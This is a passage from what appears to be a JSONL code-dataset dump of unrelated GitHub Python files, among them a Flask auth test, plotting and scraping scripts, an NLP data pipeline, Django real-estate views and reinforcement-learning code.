foo():\n return 'content'\n\n with app.test_request_context(headers={'X-Api-Token': client_token}):\n with pytest.raises(Unauthorized):\n foo()\n\n\ndef test_auth_success(app):\n app.config['ST_API_TOKEN'] = 'known_token'\n\n @auth\n def foo():\n return 'content'\n\n with app.test_request_context(headers={'X-Api-Token': 'known_token'}):\n resp = foo()\n assert resp == 'content'\n","repo_name":"sbg/seventweets","sub_path":"tests/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18914418860","text":"r\"\"\"\nCartesian power\n===============\n\n**X**\\ *width*\\ [**p**\\ *pvalue*]/[*height*\\ [**p**\\ *pvalue*]]: Give the\n*width* of the figure and the optional argument *height*. The axis or axes with\na logarithmic transformation requires **p** and the power transformation for\nthat axis.\n\"\"\"\nimport numpy as np\nimport pygmt\n\n# Create a list of y values 0-10\nyvalues = np.arange(0, 11)\n# Create a list of x-values that are the square of the y-values\nxvalues = yvalues ** 2\n\nfig = pygmt.Figure()\nfig.plot(\n region=[0, 100, 0, 10],\n # Set the power transformation of the x-axis, with a power of 0.5\n projection=\"X15cp0.5/10c\",\n # Set the figures frame, color, and gridlines\n frame=[\"WSne+givory\", \"xa1p\", \"ya2f1\"],\n # Set the line thickness to *thick*\n # Use the default color *black* and the default style *solid*\n pen=\"thick\",\n x=xvalues,\n y=yvalues,\n)\n# Plot x,y values as points on the line\n# Style of points is 0.2 cm circles, color is *green* with a *black* outline\n# Points are not clipped if they go off the figure\nfig.plot(x=xvalues, y=yvalues, style=\"c0.2c\", color=\"green\", no_clip=True, pen=\"black\")\nfig.show()\n","repo_name":"geodeepak/Pygmt","sub_path":"examples/projections/nongeo/cartesian_power.py","file_name":"cartesian_power.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24303172123","text":"# -*- coding: utf-8 -*-\r\nservicio = Field(\"servicio\")\r\ntipo_servicio = Field(\"tipo_servicio\",label=\"Tipo de servicio\")\r\nsector = Field(\"sector\")\r\nno_traza = Field(\"no_traza\",label=\"No de Traza\")\r\nsoporte = Field(\"soporte\")\r\n\r\npar_en_rack = Field(\"par_en_rack\",label=\"Par en rack\")\r\ncable = Field(\"cable\")\r\npar = Field(\"par\")\r\nterminal = Field(\"terminal\")\r\n\r\ndireccion = Field(\"direccion\",label=\"Dirección\")\r\ncircuito_de_linea = Field(\"circuito_de_linea\",label=\"Circuito de Línea\")\r\nsitio = Field(\"sitio\")\r\ncentral = Field(\"central\")\r\ndb.define_table(\"facilidades_pe\",servicio,tipo_servicio,sector,no_traza,soporte,par_en_rack,cable,par,terminal,direccion,circuito_de_linea,sitio,central)\r\n\r\n#,requires=IS_IN_DB(db,db.facilidades_pe.servicio)\r\nservicio_pe = Field(\"servicio_pe\")\r\ndb.define_table(\"servicios_nauta_hogar\",servicio_pe)","repo_name":"geordanisb/sisgiem","sub_path":"applications/odr/models/planta_exterior.py","file_name":"planta_exterior.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22398743583","text":"import sys\nfrom itertools import combinations\n\nn, m = map(int, input().split())\n\nmaps=[]\nfor i in range(n):\n maps.append(list(map(int, input().split())))\n\nresult = []\nhome=[]\nchicken=[]\n\nfor i in range(n):\n for j in range(n):\n if maps[i][j] == 1:\n home.append((i, j))\n\n elif maps[i][j] == 2:\n chicken.append((i, j))\n\npick_chicken = list(combinations(chicken, m))\n\nfor chi in pick_chicken:\n temp = 0\n for h in home:\n chi_len = 999\n for j in range(m):\n chi_len = min(chi_len, abs(h[0] - chi[j][0]) + abs(h[1] - chi[j][1]))\n temp += chi_len\n result.append(temp)\n \nprint(min(result))","repo_name":"parksangmyeong1/Algorithm","sub_path":"Python/브루트포스/[BOJ]치킨 배달.py","file_name":"[BOJ]치킨 배달.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40474685507","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom collector.practice.CollectorService import get_daum_news\n\nmain_url = 'https://news.daum.net/breakingnews/digital'\n# SSL Error 가 뜰 경우 -> requests.get(url, verify=False)\n\nresult = requests.get(main_url)\n\ndoc = BeautifulSoup(result.text, 'html.parser')\n\n# : a태그는 클릭했을 때 해당 url로 이동\n# len() : list[]의 갯수를 알려주는 함수\nurl_list = doc.select('ul.list_news2 a.link_txt')\n# pprint.pprint(title_list)\n\n# enumerate() : 반복하면서 index번호와 item을 모두 가져옴\n# list[] 의 index는 0번부터 시작\n# len(list) = 15, index 0 ~ 14\n\nfor i, url in enumerate(url_list):\n print(f'인덱스:{i+1}, url: {url[\"href\"]}')\n get_daum_news(url[\"href\"])","repo_name":"latteisacat/cnu_ai_senti_analysis","sub_path":"collector/practice/DaumNewsList.py","file_name":"DaumNewsList.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7258977146","text":"from setuptools import setup, find_packages\nfrom sys import version_info\nfrom gitclonesync import VERSION\n\n# this is so horriby unfortunate. see readme\nif version_info[0] > 2:\n print(\"ERROR: This project requires GitPython, which does not currently support Python3\")\n raise SystemExit(1)\nif version_info[0] == 2 and version_info[1] < 7:\n print(\"ERROR: This project uses argparse, which requires Python 2.7+\")\n raise SystemExit(1)\n\nwith open('README.rst') as file:\n long_description = file.read()\n\nwith open('CHANGES.rst') as file:\n long_description += '\\n' + file.read()\n\nrequires = [\n 'GitPython>=0.3.2.1',\n 'github3.py>=0.8.2',\n]\n\nclassifiers = [\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: End Users/Desktop',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Natural Language :: English',\n 'Operating System :: POSIX',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 2 :: Only',\n 'Programming Language :: Python :: Implementation :: PyPy',\n 'Topic :: Software Development :: Version Control',\n 'Topic :: Utilities',\n]\n\nsetup(\n name='gitclonesync',\n version=VERSION,\n author='Jason Antman',\n author_email='jason@jasonantman.com',\n packages=find_packages(),\n entry_points={\n 'console_scripts': [\n 'git_clone_sync = gitclonesync.clonesyncer:cli_entry',\n 'set_github_remote = gitclonesync.githubclone:cli_entry',\n ],\n },\n url='http://github.com/jantman/git-clone-sync/',\n license='GPLv3+',\n description='Script to keep git clones in sync with origin and upstream',\n long_description=long_description,\n install_requires=requires,\n keywords=\"git clone cron\",\n classifiers=classifiers\n)\n","repo_name":"jantman/git-clone-sync","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"1364043828","text":"import sys\r\nfrom lvs_ssh import start_ssh\r\n\r\ndef get_ios(sh_ver):\r\n '''\r\n Get IOS from switches\r\n '''\r\n sh_ver = sh_ver.split('\\r\\n')\r\n sh_ver = [i for i in sh_ver if i.rstrip()!='']\r\n image = 'ios: error'\r\n model = 'model: error'\r\n for line in sh_ver:\r\n #Get the model name\r\n if line.startswith('Model number'):\r\n model = line.split()[-1]\r\n #Get the ios name from 'sh ver'\r\n if 'System image' in line:\r\n image = line.split()[-1].split(':')[-1].rstrip('\"')\r\n if image[0] == '/':\r\n image = image.replace('/', '')\r\n return model, image\r\n\r\nresult = []\r\nresult_s = []\r\nssh_res = start_ssh('sh ver')\r\nresult = [get_ios(i[1]) for i in ssh_res]\r\nresult = sorted(list(set(result)))\r\nfor line in result:\r\n result_s.append('{:25} {}\\n'.format(line[0], line[1]))\r\nwith open('ios', 'w') as f:\r\n f.writelines(result_s)\r\nprint(result)\r\n","repo_name":"romalukin/lan_scripts","sub_path":"get_ios.py","file_name":"get_ios.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29344912727","text":"from Rexample import *\nclass Manzoniexample(Rexample):\n# this class produces SoilR test that reflect the nomenclature of the manzoni paper\n# and allow to specify the analytic solutions that can not be computed by sympy\n\n def __init__(self,name,matrix,c_sym,meanTransitTime,subslist):\n nr=matrix.rows \n inputrates=zeros(nr,1)\n f=lambda el:el.subs(subslist)\n iv=Matrix([f(ci) for ci in c_sym])\n self.iv=iv/iv.norm()\n self.c_sym=c_sym\n self.subslist=subslist\n self.meanTransitTime=meanTransitTime\n\n super(Manzoniexample,self).__init__(name,matrix,iv,inputrates)\n self.trunk=\"runit.Manzoni.\"+name\n self.n=nr\n############################################################################\n def setUpVars(self):\n Text=\"\"\n for i in range(len(self.subslist)):\n tup=self.subslist[i]\n print(tup)\n Text+=(self.shift+str(tup[0])+\"=\"+str(tup[1])+\"\\n\")\n # we start not at zero since some of the analytical solutions yield NaN for t=0\n Text+=\"\\\n t_start=0.0\\n\\\n t_end=2\\n\\\n tn=100\\n\\\n tol=.02/tn\\n\\\n #print(tol)\\n\\\n timestep=(t_end-t_start)/tn\\n\\\n t=seq(t_start,t_end,timestep)\\n\\\n A=new(\\\"ConstLinDecompOp\\\",\"+rmatrixprint(self.matrix,self.shift)+\")\\n\"\n\n Text+=\"\\\n inputrates=new(\\\"TimeMap\\\",t_start,t_end,function(t){return(\"+rmatrixprint(self.inputrates,self.shift)+\")})\\n\"\n return(Text)\n\n############################################################################\n def analyticCandResp(self):\n sl=self.subslist\n inputrates=self.inputrates.subs(sl)\n m=self.matrix.subs(sl)\n c_sym=self.c_sym\n ck=self.iv\n n=m.rows\n t= Symbol(\"t\")\n tau= Symbol(\"tau\")\n self.anls=(m*t).exp()*c_sym+((m*tau).exp()*inputrates).integrate((tau,0,t))\n print(self.anls)\n print(self.anls.subs({t:0}))\n testvec=ones(1,n)\n respcoeffs=-testvec*m\n print(\"respcoeff=\\n\",respcoeffs)\n self.anlresp=(respcoeffs.transpose()).multiply_elementwise(self.anls)\n self.c_sym_strs=[str(c_i) for c_i in c_sym]\n self.n=n\n############################################################################\n def setUpModel(self):\n Text=super(Manzoniexample,self).setUpModel()\n Text+=\"\\\n meanTransitTimeode=getMeanTransitTime(\\n\\\n A,\\n\"\\\n +rlistprint(self.c_sym_strs,self.shift)\\\n +\"\\n)\\n\"\n Text+=\"\\\n TTDode=getTransitTimeDistributionDensity(\\n\\\n A,\\n\"\\\n +rlistprint(self.c_sym_strs,self.shift)\\\n +\"\\n,t\\n)\\n\"\n return(Text)\n############################################################################\n def sols(self):\n Text=super(Manzoniexample,self).sols()\n Text+=\"meanTransitTime=\"+str(self.meanTransitTime)+\"\\n\"\n return(Text)\n############################################################################\n def plots(self):\n Text=super(Manzoniexample,self).plots()\n Text+=\"\\\n plot(t,TTDode,type=\\\"l\\\",lty=lt1,col=1,ylab=\\\"TransitTimeDistributionDensity\\\",xlab=\\\"Time\\\")\\n\"\n return(Text)\n############################################################################\n def checks(self):\n Text=super(Manzoniexample,self).checks()\n Text+=\"\\\n checkEquals(\\n\\\n meanTransitTime,\\n\\\n meanTransitTimeode,\\n\\\n \\\"test numeric solution for the mean transit Tiye computed by the ode mehtod against analytical value taken from manzoni et al\\\",\\n\\\n tolerance = tol,\\n\\\n )\\n\"\n return(Text)\n\n\n","repo_name":"MPIBGC-TEE/SoilR","sub_path":"pkg/inst/tests/automatic/Manzoniexample.py","file_name":"Manzoniexample.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"38735573607","text":"import itertools\nfrom typing import (\n Any,\n Callable,\n Dict,\n Iterable,\n List,\n Mapping,\n Sequence,\n TypeVar,\n Union,\n)\n\nimport datasets\nimport numpy as np\nimport tokenizers\nfrom tokenizers import Tokenizer\n\nfrom .common import Config, get_logger\n\nT = TypeVar(\"T\")\nlogger = get_logger()\n\n\nRNGLike = Union[int, np.random.Generator]\n\n\ndef _to_rng(rng_like: RNGLike) -> np.random.Generator:\n return np.random.default_rng(rng_like) if isinstance(rng_like, int) else rng_like\n\n\ndef _stream_huggingface_dataset(\n *args: str,\n **kwargs: str,\n) -> Iterable[Dict[str, Any]]:\n dataset = datasets.load_dataset(*args, **kwargs, streaming=True)\n return (dict(sample) for sample in dataset)\n\n\ndef _load_huggingdace_tokenizer(\n *args: str,\n **kwargs: str,\n) -> Tokenizer:\n if len(args) == 1 and args[0].strip().lower().endswith(\".json\"):\n logger.info(f\"Loading tokenizer from JSON file: {args[0]}\")\n return Tokenizer.from_file(*args, **kwargs)\n logger.info(f\"Loading tokenizer from HuggingFace: {args}, {kwargs}\")\n return tokenizers.Tokenizer.from_pretrained(*args, **kwargs)\n\n\ndef load_huggingface_dataset(\n args: Iterable[str],\n kwargs: Mapping[str, str],\n load_dataset_fn: Callable[\n ..., Iterable[Dict[str, Any]]\n ] = _stream_huggingface_dataset,\n repeat_forever: bool = False,\n) -> Iterable[str]:\n if isinstance(args, str):\n raise TypeError(f\"Expected args to be a sequence of str, got {args}\")\n args = list(args)\n kwargs = dict(kwargs)\n key = kwargs.pop(\"key\", \"text\")\n for epoch in itertools.count():\n logger.info(\n f\"Streaming dataset from HuggingFace: {args}, {kwargs} (epoch: {epoch})\"\n )\n dataset = load_dataset_fn(*args, **kwargs)\n samples = (sample[key] for sample in dataset)\n samples = (sample for sample in samples if sample.strip())\n yield from samples\n if not repeat_forever:\n break\n\n\ndef merge_datasets(\n datasets: Iterable[Iterable[T]],\n weights: Iterable[float],\n rng: RNGLike,\n) -> Iterable[T]:\n p = np.array(list(weights), dtype=float)\n p = p / p.sum()\n rng = _to_rng(rng)\n iterators = [iter(dataset) for dataset in datasets]\n while True:\n index = rng.choice(len(iterators), p=p)\n yield next(iterators[index])\n\n\ndef tokenizer_from_config(\n config: Config,\n) -> Tokenizer:\n return load_huggingface_tokenizer(\n config.tokenizer.args,\n config.tokenizer.kwargs,\n )\n\n\ndef load_huggingface_tokenizer(\n args: Iterable[str],\n kwargs: Mapping[str, str],\n load_tokenizer_fn: Callable[..., Tokenizer] = _load_huggingdace_tokenizer,\n) -> Tokenizer:\n return load_tokenizer_fn(*args, **kwargs)\n\n\ndef tokenize_samples(\n samples: Iterable[str],\n tokenizer: Tokenizer,\n batch_size: int = 1000,\n) -> Iterable[Iterable[int]]:\n def tokenizer_fn(texts: Sequence[str]) -> Sequence[Sequence[int]]:\n return [enc.ids for enc in tokenizer.encode_batch(texts)]\n\n batched_indices = (tokenizer_fn(chunk) for chunk in chunks(samples, batch_size))\n indices = (index for batch in batched_indices for index in batch)\n yield from indices\n\n\ndef chain_and_split(\n arrays: Iterable[Iterable[T]],\n length: int,\n) -> Iterable[Iterable[T]]:\n ids = (id for array in arrays for id in array)\n yield from chunks(ids, length)\n\n\ndef chunks(\n iterable: Iterable[T],\n size: int,\n drop_last: bool = False,\n) -> Iterable[Sequence[T]]:\n iterator = iter(iterable)\n while True:\n chunk = list(itertools.islice(iterator, size))\n if not chunk:\n break\n if drop_last and len(chunk) < size:\n break\n yield chunk\n\n\ndef shuffle(\n xs: Iterable[T],\n buffer_size: int,\n rng: RNGLike,\n) -> Iterable[T]:\n if buffer_size <= 0:\n raise ValueError(f\"Expected buffer_size > 0, got {buffer_size}\")\n rng = _to_rng(rng)\n buffer: List[T] = list(itertools.islice(xs, buffer_size))\n for x in xs:\n index = rng.integers(len(buffer))\n buffer[index], x = x, buffer[index]\n yield x\n yield from rng.permutation(np.array(buffer), 0)\n\n\ndef batches_from_config(\n config: Config,\n rng: Union[int, np.random.Generator],\n extra_length: int = 0,\n) -> Iterable[np.ndarray]:\n rng = _to_rng(rng)\n datasets = (\n load_huggingface_dataset(\n args=ds.args,\n kwargs=ds.kwargs,\n repeat_forever=True,\n )\n for ds in config.dataset\n )\n # Shuffle the samples of each dataset. This prevents the samples from\n # low-frequency datasets to be almost sequential due to a too-small buffer\n # size for the final shuffle.\n datasets = (\n shuffle(\n xs=ds,\n buffer_size=config.data.per_dataset_shuffle_buffer_size,\n rng=rng,\n )\n for ds in datasets\n )\n weights = (ds.weight for ds in config.dataset)\n dataset = merge_datasets(datasets=datasets, weights=weights, rng=rng)\n tokenizer = load_huggingface_tokenizer(\n args=config.tokenizer.args,\n kwargs=config.tokenizer.kwargs,\n )\n indices = tokenize_samples(dataset, tokenizer)\n indices = chain_and_split(arrays=indices, length=config.data.length + extra_length)\n # Shuffle the individual chunks\n indices = shuffle(\n xs=indices,\n buffer_size=config.data.shuffle_buffer_size,\n rng=rng,\n )\n batches = chunks(indices, size=config.data.batch_size)\n arrays = (np.array(batch, dtype=np.int32) for batch in batches)\n return arrays\n","repo_name":"nlsfnr/NoLo","sub_path":"nolo/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23958569774","text":"# %%\n# %%\n# with tf.Session() as session:\n# session.run([tf.global_variables_initializer(), tf.tables_initializer()])\n# message_embeddings = session.run(embed(messages))\n# for i, message_embedding in enumerate(np.array(message_embeddings).tolist()):\n# print(\"Message: {}\".format(messages[i]))\n# print(\"Embedding size: {}\".format(len(message_embedding)))\n# message_embedding_snippet = \", \".join(\n# (str(x) for x in message_embedding[:3]))\n# print(\"Embedding: [{}, ...]\\n\".format(message_embedding_snippet))\n\n# %%\nimport tensorflow as tf\nimport tensorflow_hub as hub\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport re\nimport seaborn as sns\nimport numpy as np\nimport pickle\nfrom sklearn.linear_model import SGDClassifier, LogisticRegression\nfrom sklearn.metrics import accuracy_score, f1_score, classification_report\n# %%\n# @return a list of dataframes\n\n\ndef getData(dataDir='/Users/adamchang/programming/Medical Device Security/Embedding/Data/Auto_Data/',\n fileSuffix='.xlsx', startYear=2014, endYear=2019,\n filenamePattern='unique[0123456789]{4}_auto_determined.xlsx'):\n files = os.listdir(dataDir)\n dfList = []\n for filename in files:\n if re.match(filenamePattern, filename) is not None:\n year = int(filename.split('.')[0].split('unique')[1].split('_')[0])\n if year >= startYear and year <= endYear:\n name = dataDir + filename.split('.')[0] + fileSuffix\n df = pd.read_excel(name)\n dfList.append((df, filename.split('.')[0]))\n return dfList\n\n\ndef labelToOrdinal(s):\n if str(s) == 'Not_Computer':\n return 0\n else:\n return 1\n\n\ndef ordinalToLabel(d):\n if (d == 0).bool():\n return 'Not_Computer'\n else:\n return 'Computer'\n\n\ndef train(xTrain, yTrain):\n # model = SGDClassifier(loss='hinge', penalty='l2', alpha=1e-3,\n # random_state=42, max_iter=50, tol=1e-3)\n model = LogisticRegression(random_state=0)\n model.fit(xTrain, yTrain)\n # pickle.dump(model, open(\n # '/Users/adamchang/programming/Medical Device Security/Embedding/Data/Aux_Data/trained_model_embedding.txt', 'w'))\n # print('model dumped')\n return model\n\n\ndef test(testData, model, session):\n for dfTestTuple in testData:\n dfTest = dfTestTuple[0]\n messages = dfTest['Reason for Recall'].values.astype('U')\n message_embeddings = session.run(embed(messages))\n xTest = message_embeddings\n yPred = model.predict(xTest)\n yLabel = dfTest['Fault_Class'].apply(labelToOrdinal).values\n\n print('performance on ' + dfTestTuple[1])\n print('percent computer related predicted')\n print(np.sum(yPred) / float(np.size(yPred)))\n print('percent computer related true')\n print(np.sum(yLabel) / float(np.size(yLabel)))\n print(classification_report(yLabel, yPred))\n print(\"accuracy: {:.2f}%\".format(accuracy_score(yLabel, yPred) * 100))\n print(\"f1 score: {:.2f}%\".format(f1_score(yLabel, yPred) * 100))\n\n dfPred = pd.DataFrame(\n yPred, columns=['Predicted Fault Class']).apply(ordinalToLabel,\n axis=1)\n dfTest = pd.concat([dfTest, dfPred],\n axis=1)\n filename = '/Users/adamchang/programming/Medical Device Security/Embedding/Data/Auto_Data/' + \\\n dfTestTuple[1] + '_prediction.xlsx'\n dfTest.to_excel(filename, index=False, engine='xlsxwriter')\n\n# %%\n# os.environ['TFHUB_CACHE_DIR'] = '../tf_cache/'\n# @param [\"https://tfhub.dev/google/universal-sentence-encoder/2\", \"https://tfhub.dev/google/universal-sentence-encoder-large/3\"]\n\n\nmodule_url = \"https://tfhub.dev/google/universal-sentence-encoder-large/3\"\nembed = hub.Module(module_url)\ntf.logging.set_verbosity(tf.logging.ERROR)\nsession = tf.Session()\nsession.run([tf.global_variables_initializer(), tf.tables_initializer()])\n\n# %%\ndf = pd.read_excel(\n '/Users/adamchang/programming/Medical Device Security/Embedding/Data/Merged_Data/Merged_Final_Unique_Recalls_2007_2013_groundtruth.xlsx')\nmessages = df['Reason for Recall'].values\nxTrain = session.run(embed(messages))\n# %%\nyTrain = df['Fault Class']\nyTrain = yTrain.apply(labelToOrdinal)\nmodel = train(xTrain, yTrain)\n# %%\ntestData = getData()\n# %%\ntest(testData, model, session)\n\n\n# %%\n","repo_name":"achang77/Medical-Device-Security","sub_path":"Embedding/Scripts/sentence_encoder.py","file_name":"sentence_encoder.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24145868992","text":"from app.models import Home, ExtraImage, ContactInfo, Favorites\nfrom django.db.models import Q\nfrom django.views import generic as generic_views\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\n\nclass UserLogin(generic_views.ListView):\n\n def post(self, request, **kwargs):\n username = request.POST['username']\n password = request.POST['password']\n next_page = request.POST.get('next')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n\n return HttpResponseRedirect(next_page or reverse('mainpage'))\n else:\n return 'invalid login'\n\n\nclass UserLogout(generic_views.ListView):\n\n def post(self, request, **kwargs):\n next_page = request.POST.get('next')\n logout(request)\n return HttpResponseRedirect(next_page or reverse('mainpage'))\n\n\nclass UserCreateTemplateView(generic_views.TemplateView):\n template_name = 'logincreate/create.html'\n context_object_name = 'create'\n\n\nclass PremiumHomeTemplateView(generic_views.ListView):\n template_name = 'main_page/main_page.html'\n context_object_name = 'homes'\n\n def get_queryset(self):\n qset = Home.objects.filter(published=True)\n qset = qset.filter(is_premium=True)\n return qset\n\n\nclass HomeTemplateView(generic_views.ListView):\n template_name = 'homes_page/homes_page.html'\n context_object_name = 'homes'\n\n def get_queryset(self):\n qset = Home.objects.all()\n if not self.request.GET.get('q'):\n return Home.objects.filter(published=True)\n else:\n params = self.request.GET['q']\n if params:\n\n # Poor mans search endpoint\n search_term = params.strip()\n\n\n qset = qset.filter(\n Q(title__icontains=search_term) |\n Q(city__icontains=search_term) |\n Q(street__icontains=search_term) |\n Q(mlsnumber__number__icontains=search_term)\n )\n return qset.distinct()\n\n\nclass HomeDetailsTemplateView(generic_views.ListView):\n template_name = 'details_page/details_page.html'\n context_object_name = 'details'\n\n def get_queryset(self):\n qset = Home.objects.get(pk=self.kwargs['id'])\n if ExtraImage.objects.filter(home=self.kwargs['id']).exists():\n qset.extrainfo = ExtraImage.objects.get(home=self.kwargs['id'])\n else:\n return qset\n return qset\n\n\nclass FavoritesHomeTemplateView(generic_views.ListView):\n template_name = 'favorites/favorites_page.html'\n context_object_name = 'favorites'\n\n def post(self, request, **kwargs):\n print(self.request.POST)\n home = self.request.POST.get('homepk')\n next_page = request.POST.get('next')\n if len(self.request.user.favorites.filter(pk=home)) > 0:\n Favorites.objects.get(list=home).delete()\n return HttpResponseRedirect(next_page)\n else:\n newfav = Favorites(user=self.request.user, list=Home.objects.get(pk=home))\n newfav.save()\n return HttpResponseRedirect(next_page)\n\n def get_queryset(self):\n return self.request.user.favorites.all()\n\n\nclass SearchHomesTemplateView(generic_views.ListView):\n template_name = 'search/search_page.html'\n context_object_name = 'results'\n\n def get_queryset(self):\n qset = Home.objects.all()\n params = self.request.GET\n if params:\n\n if params['totalbeds'] and params['totalbeds'] != '':\n qset = qset.filter(\n Q(numofbeds__icontains=params['totalbeds'])\n )\n\n if params['totalbaths'] and params['totalbaths'] != '':\n qset = qset.filter(Q(numofbaths__icontains=params['totalbaths'])\n )\n\n if params['pricerangestart'] and params['pricerangestart'] != '':\n qset = qset.filter(Q(price__gte=params['pricerangestart'])\n )\n\n if params['pricerangestop'] and params['pricerangestop'] != '':\n qset = qset.filter(Q(price__lte=params['pricerangestop'])\n )\n\n if params['pricerangestart'] and params['pricerangestop'] and params['pricerangestart'] != '' and \\\n params['pricerangestop'] != '':\n qset = qset.filter(Q(price__range=(params['pricerangestart'], params['pricerangestop'])))\n\n if params['q']:\n # Poor mans search endpoint\n search_term = params['q'].strip()\n\n qset = qset.filter(\n Q(title__icontains=search_term) |\n Q(city__icontains=search_term) |\n Q(street__icontains=search_term) |\n Q(mlsnumber__number__icontains=search_term)\n )\n return qset.distinct()\n return qset\n\n\nclass ContactsTemplateView(generic_views.ListView):\n template_name = 'contacts/contacts_page.html'\n context_object_name = 'contacts'\n\n def get_queryset(self):\n return ContactInfo.objects.first()\n","repo_name":"Sfebtyler/Real-estate-project","sub_path":"backend/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22296609702","text":"import gym\nimport argparse\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\n\n\ndef parse_args():\n desc = \"Implementation of temporal difference methods for discrete OpenAI Gym enviornments\" \n parser = argparse.ArgumentParser(description=desc)\n\n parser.add_argument('--env', type=str, help='Gym Environment. Must be discrete in action space and observation space. Observation space can be tuple of discrete spaces.', default='FrozenLake-v0')\n\n parser.add_argument('--method', type=str, default='q_learning', choices=['sarsa', 'q_learning'], help='Temporal difference method to determine action-value function and policy.')\n\n parser.add_argument('--episodes', type=int, default=10000, help='Total number of game episodes')\n\n parser.add_argument('--render', type=bool, default=False, help='Render the game environment.')\n\n parser.add_argument('--gamma', type=float, default=0.95, help='Discout factor.')\n\n parser.add_argument('--epsilon', type=float, default=1.0, help='Starting value for epsilon, the random action probability.')\n\n parser.add_argument('--epsilon_taper', type=float, default=0.01, help='Rate to decrease epsilon over each episode.')\n\n parser.add_argument('--alpha', type=float, default=0.1, help='Learning rate.')\n\n parser.add_argument('--alpha_taper', type=float, default=0.01, help='Rate to decrease alpha over each visit to a state-action pair.')\n\n args = parser.parse_args()\n\n return args\n\nclass TDagent(object):\n def __init__(self, env, args=None):\n self.states = self._init_states(env)\n self.nA = env.action_space.n\n self.method = args.method\n self.Q = defaultdict(lambda: np.zeros(self.nA))\n self.policy = { s: np.random.randint(self.nA) for s in self.states }\n self.behavior = {}\n self.count = defaultdict(lambda: np.zeros(self.nA))\n self.gamma = args.gamma\n self.epsilon = args.epsilon\n self.epsilon_taper = args.epsilon_taper\n self.alpha = args.alpha\n self.alpha_taper = args.alpha_taper\n self.t = 0\n self.set_behavior()\n\n def _init_states(self, env):\n if type(env.observation_space) == gym.spaces.Tuple:\n states = list(product(*[list(range(space.n)) for space in env.observation_space.spaces]))\n pass\n else:\n states = list(range(env.observation_space.n))\n return states\n\n def set_behavior(self):\n self.t += 1\n epsilon = self.epsilon/(1 + self.epsilon_taper * self.t)\n for s in self.states:\n self.behavior[s] = np.ones(self.nA, dtype=float) * self.epsilon/self.nA\n self.behavior[s][self.policy[s]] += (1-self.epsilon)\n\n def choose_action(self, s):\n return np.random.choice(self.nA, p=self.behavior[s])\n\n def update_policy(self, state, action, reward, next_state, next_action=None):\n self._update_Q(state, action, reward, next_state, next_action)\n self._set_policy()\n\n def _update_Q(self, state, action, reward, next_state, next_action):\n next_Q = { \n \"sarsa\": self.Q[next_state][next_action], \n \"q_learning\": np.argmax(self.Q[next_state])\n }[self.method]\n self.count[state][action] += 1\n alpha = self.alpha/(1 + self.alpha_taper * self.count[state][action])\n self.Q[state][action] += alpha * (reward + self.gamma*next_Q - self.Q[state][action])\n\n def _set_policy(self):\n for s in self.states:\n self.policy[s] = np.argmax(self.Q[s])\n\n\ndef main():\n args = parse_args()\n\n print('Creating game environment for {}...'.format(args.env))\n env = gym.make(args.env)\n\n print('Creating agent...')\n agent = TDagent(env=env, args=args)\n\n print('Training agent...')\n episode_reward = []\n for e in range(args.episodes):\n total_reward = 0\n done = False\n state = env.reset()\n action = agent.choose_action(state)\n while not done:\n if args.render: \n env.render()\n next_state, reward, done, _ = env.step(action)\n next_action = agent.choose_action(state)\n agent.update_policy(state, action, reward, next_state, next_action)\n total_reward += reward\n state = next_state\n action = next_action\n agent.set_behavior()\n episode_reward.append(total_reward)\n print('Average Reward from {} Episodes: {}'.format(args.episodes, np.mean(episode_reward)))\n plt.plot(episode_reward, 'o')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ahlad-reddy/reinforcement-learning-gym","sub_path":"temporal_difference.py","file_name":"temporal_difference.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14127830212","text":"class Solution:\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n ans = 0\n beg = 0\n dic = {}\n if s is None:\n return 0\n # m 1\n for i in range(len(s)):\n if s[i] in dic and beg <=dic[s[i]]:# 防止beg往前跑,下面的t\n beg=dic[s[i]]+1\n else:\n ans =max(ans,i-beg+1)\n dic[s[i]] = i\n return ans\nif __name__ == 